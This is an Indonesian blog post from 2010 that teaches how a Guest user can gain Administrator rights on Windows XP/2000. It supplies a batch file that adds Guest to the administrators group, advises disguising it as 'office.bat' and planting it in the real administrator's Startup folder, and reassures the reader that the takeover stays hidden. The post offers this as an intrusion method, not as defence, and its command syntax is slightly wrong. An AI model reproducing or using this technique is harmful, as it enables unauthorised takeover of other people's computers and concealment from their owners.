Senin, 12 Juli 2010

Windows Hacking

Aang Yogya, Mengubah level access dari Guest menjadi Administrator pada Windows XP atau Windows 2000. Jika anda dapat mengakses sebuah komputer, namun sayangnya posisi anda hanyalah seorang Guest yang hak aksesnya sangatlah terbatas. Jika dalam Windows XP atau Windows 2000 posisi anda sebagai user biasa ataupun hanya seorang guest, anda tetap dapat melakukan "KUDETA" untuk mendapatkan posisi sebagai Administrator.

Sebenarnya anda dapat melakukan pengecekan posisi user anda menggunakan perintah: net user nama_user atau jika anda guest ketiklah "net user guest". Supaya anda juga dapat berperan sebagai Administrator, walaupun nama anda tetaplah Guest. Ketiklah script dibawah ini menggunakan Notepad:
@echo off
net localgroup Administrator Guest/add
exit
Simpanlah file tersebut dengan nama yang tidak mencurigakan administrator asli. Misalnya, office.bat, ingat ekstensi yang digunakan adalah .BAT. letakkan file tersebut pada folder berikut:
c:\Document and Setting\"Nama Administrator"\Start Menu\Programs\Startup

Selanjutnya anda harus menunggu sang Administrator menjalankan atau merestart komputer untuk menjalankan file office.bat yang telah anda buat. Kemudian anda periksa status user ana menggunakan perintah net user Guest. Coba anda lihat pada bagian Local Group Memberships, kini anda menyandang dua jabatan yaitu sebagai Guest dan Administrator. Jika anda masih kurang percaya bahwa anda sebagai Administrator, coba buka User Account pada Control Panel. Sekarang anda perhatikan, terdapat dua buah accout Guest dan yang satunya adalah Administrator.

Anda tidak perlu takut jika Administrator Asli membuka User Account sebab yang terlihat hanyalah Guest account is on, sedangkan Guest yang berperan sebagai Administrator tidak akan kelihatan.